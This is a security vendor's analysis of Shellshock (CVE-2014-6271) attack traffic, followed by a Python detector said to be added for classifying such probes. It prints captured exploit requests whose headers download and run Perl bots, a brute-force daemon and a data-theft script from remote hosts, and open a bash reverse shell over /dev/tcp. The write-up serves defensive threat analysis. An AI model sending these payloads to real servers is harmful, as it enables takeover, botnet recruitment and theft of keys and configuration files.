SHELLSHOCK – Threat samples from CVE-2014-6271


To our surprise we collected nearly 23 malware samples in the first 11 hours of activity, starting on the morning of the 26th UTC. Rather than wait beyond those 11 hours, we decided to document what we had picked up so far. To draw a premature conclusion: “Bad actors maintain a constant state of preparedness to execute a mass exploitation campaign on any new and available vulnerability”.

The “Good Samaritan” Scan

The first ones to appear on the radar were the “good samaritan” scans. These could be either security researchers scanning across the continents or (more likely) bad actors documenting vulnerable systems for later use. One of the most common samples exploits the bug to make the system send an ICMP echo request back to a listening (documentation) server.

GET / HTTP/1.0
User-Agent: () { :; }; ping -c 900 xxx.xxx.xxx.xxx
Accept: */*

The ping was more of a quick and dirty method for identifying vulnerable servers; soon we started receiving more complex scans. The one below was set up so that a vulnerable server would call back a randomly generated URI; the staging server would then use this random string to record the server's details for later use.

GET / HTTP/1.1
Accept-Encoding: identity
Referer: () { :; }; /bin/bash -c 'wget http://cxxxxxxxat.ru/bmV0Y3J1aXNlLmluU2hlbGxTaG9ja1NhbHQ= >> /dev/null'
Host: xxx.xxxxxx.xx
Cookie: () { :; }; /bin/bash -c 'wget http://cxxxxxxxat.ru/bmV0Y3J1aXNlLmluU2hlbGxTaG9ja1NhbHQ= >> /dev/null'
Connection: close
User-Agent: () { :; }; /bin/bash -c 'wget http://cxxxxxxxat.ru/bmV0Y3J1aXNlLmluU2hlbGxTaG9ja1NhbHQ= >> /dev/null'

Notice the subtle way in which the downloaded file is discarded to /dev/null, just to ensure no traces are left behind.

IRC Bot – DDoS Launcher

This is a typical IRC bot: it downloads itself from the vulture machine, installs, and cleans up the residue. The Perl file is a known IRC bot that connects to a predefined IRC server and listens for commands.

GET /cgi-bin/hi HTTP/1.0
User-Agent: () { :;}; /bin/bash -c "cd /tmp;wget http://213.5.xx.xxx/ji;curl -O /tmp/ji http://213.5.xx.xxx/jurat ; perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*"

The bot has a large number of template commands for managing an IRC connection; however, it is designed to launch specific DDoS attacks on targets defined by the bot master through IRC in real time.

Brute-force Daemon

Another instance where a Perl script is downloaded from a vulture server and executed. This script launches an SSH brute-force daemon, which loads its wordlist from generic websites.

GET / HTTP/1.1
Cookie:() { :; }; /usr/bin/curl -o /tmp/auth.pl http://sbd.awaxxxxxxe.com/auth; /usr/bin/perl /tmp/auth.pl
Referer:() { :; }; /usr/bin/curl -o /tmp/auth.pl http://sbd.awaxxxxxxe.com/auth; /usr/bin/perl /tmp/auth.pl

The script then logs into the Command and Control (C&C) domain over IRC and downloads the targets. The daemon is stealthy and runs in low-intensity cycles.

Data Theft Agent

A *NIX system's nightmare: this is a simple bash shell script that copies the essential config files, packs them into a tar file and uploads it to the controller servers.

GET / HTTP/1.0
User-Agent: () { :;}; /bin/bash -c "wget http://staxxxxxxxt.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http://staxxxxxxxt.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh"

Key items to notice here: the .bot file is downloaded as a shell script, the script is executed, and once it is in memory it is deleted from disk. This bot is known to keep running until the server is restarted and the memory is cleaned again. Most importantly, this script does not forget the .ssh/ folder that contains all the public and private keys.

Reverse Shell

The number of hits on this sample has continued to grow consistently. It is a simple call-home script that connects to a listening server. Most of the samples collected connect to unassuming bots / compromised systems.

GET /cgi-bin/ HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: () { :;}; /bin/ -c "/bin/ -i >& /dev/tcp/xxx.xxx.xxx.xxx/3333 0>&1"

On callback, a binary file is downloaded from a vulture machine and executed. This binary calls back to the controller for commands periodically. The sheer number of compromised systems calling home has run the controller out of resources, so several connection attempts fail before one succeeds.
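As an added example (not code from the original post), the Python script below shows how a defender might sweep web-server access records for the trait every capture above shares, a bash function definition `() { ... };` planted in a request header, and sort whatever follows it into the classes seen on this page: ICMP beacon, download only, download and execute, and reverse shell over /dev/tcp. The embedded samples are constructed from the requests quoted above, with hosts left redacted as on the page; the header-splitting heuristic and the payload patterns are my own assumptions, not a published ruleset.

```python
"""Heuristic detector for Shellshock (CVE-2014-6271) probes in HTTP access
records. Added example; samples are constructed from the captures on this page."""
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple

# The trigger: a bash function definition at the start of a header value.
# Everything after the closing "};" is what a vulnerable CGI host would run.
TRIGGER_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;?")

# Payload classes, checked in order; the first match wins. These patterns are
# an assumption made for this example, not a published signature set.
PAYLOAD_CLASSES = [
    ("reverse_shell", re.compile(r"/dev/tcp/")),
    ("download_and_execute",
     re.compile(r"\b(?:wget|curl)\b.*;\s*(?:/\S*/)?(?:perl|sh|bash)\b")),
    ("download_only", re.compile(r"\b(?:wget|curl)\b")),
    ("icmp_beacon", re.compile(r"\bping\b")),
]

# Log extraction often flattens a request onto one line. A new header is taken
# to start at a whitespace-preceded, capitalised "Name:" token, so the "http:"
# inside a URL is not mistaken for a header boundary (heuristic).
HEADER_SPLIT_RE = re.compile(r"\r?\n|\s+(?=[A-Z][A-Za-z-]*:)")


@dataclass
class Detection:
    request_line: str
    header: str
    payload: str
    category: str


def parse_request(raw: str) -> Tuple[str, Dict[str, str]]:
    """Return (request line, {header: value}) for a raw or flattened request."""
    parts = [p for p in HEADER_SPLIT_RE.split(raw.strip()) if p]
    request_line, headers = parts[0], {}
    for part in parts[1:]:
        name, _, value = part.partition(":")
        headers[name.strip()] = value.strip()
    return request_line, headers


def classify_payload(payload: str) -> str:
    for label, pattern in PAYLOAD_CLASSES:
        if pattern.search(payload):
            return label
    return "unclassified"


def scan_request(raw: str) -> List[Detection]:
    """One Detection per header that carries the function-definition trigger."""
    request_line, headers = parse_request(raw)
    found = []
    for name, value in headers.items():
        m = TRIGGER_RE.search(value)
        if m is None:
            continue
        payload = value[m.end():].strip()
        found.append(Detection(request_line, name, payload, classify_payload(payload)))
    return found


def scan_requests(raws: List[str]) -> List[Detection]:
    return [d for raw in raws for d in scan_request(raw)]


def summarize(raws: List[str]) -> Dict[str, int]:
    """Count detections per payload class, a quick triage roll-up."""
    counts: Dict[str, int] = {}
    for d in scan_requests(raws):
        counts[d.category] = counts.get(d.category, 0) + 1
    return counts


# Constructed from the captures quoted on this page (hosts redacted as "xxx");
# the last line is a benign request included as a negative control.
SAMPLES = [
    "GET / HTTP/1.0 User-Agent: () { :; }; ping -c 900 xxx.xxx.xxx.xxx Accept: */*",
    "GET / HTTP/1.1 Accept-Encoding: identity Referer: () { :; }; /bin/bash -c "
    "'wget http://cxxxxxxxat.ru/bmV0Y3J1aXNlLmluU2hlbGxTaG9ja1NhbHQ= >> /dev/null' "
    "Host: xxx.xxxxxx.xx Connection: close",
    'GET /cgi-bin/hi HTTP/1.0 User-Agent: () { :;}; /bin/bash -c '
    '"cd /tmp;wget http://213.5.xx.xxx/ji;perl /tmp/ji;rm -rf /tmp/ji"',
    "GET / HTTP/1.1 Cookie:() { :; }; /usr/bin/curl -o /tmp/auth.pl "
    "http://sbd.awaxxxxxxe.com/auth; /usr/bin/perl /tmp/auth.pl",
    'GET /cgi-bin/ HTTP/1.1 Host: xxx.xxx.xxx.xxx User-Agent: () { :;}; '
    '/bin/bash -c "/bin/bash -i >& /dev/tcp/xxx.xxx.xxx.xxx/3333 0>&1"',
    "GET /index.html HTTP/1.1 Host: example.test User-Agent: Mozilla/5.0 Accept: */*",
]

if __name__ == "__main__":
    for d in scan_requests(SAMPLES):
        print(f"{d.category:22} {d.header:11} {d.request_line}")
    print(summarize(SAMPLES))
```

The trigger regex is the part worth keeping strict: it is the function definition itself that exploited bash parsed, so matching on it rather than on `wget` or `ping` catches the probe regardless of what the payload does. The class labels are only a triage aid; anything the patterns do not recognise still surfaces as "unclassified" rather than being dropped.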

CVE-2014-6271 is likely to suffer from a long-burn phenomenon. The vulnerability impacts 67.4% of servers (reference) worldwide and has the potential to create havoc for a long time to come.

© 2015-2016 All Rights Reserved. NETMONASTERY™ and CNAM™ is a registered trademark of NETMONASTERY NSPL.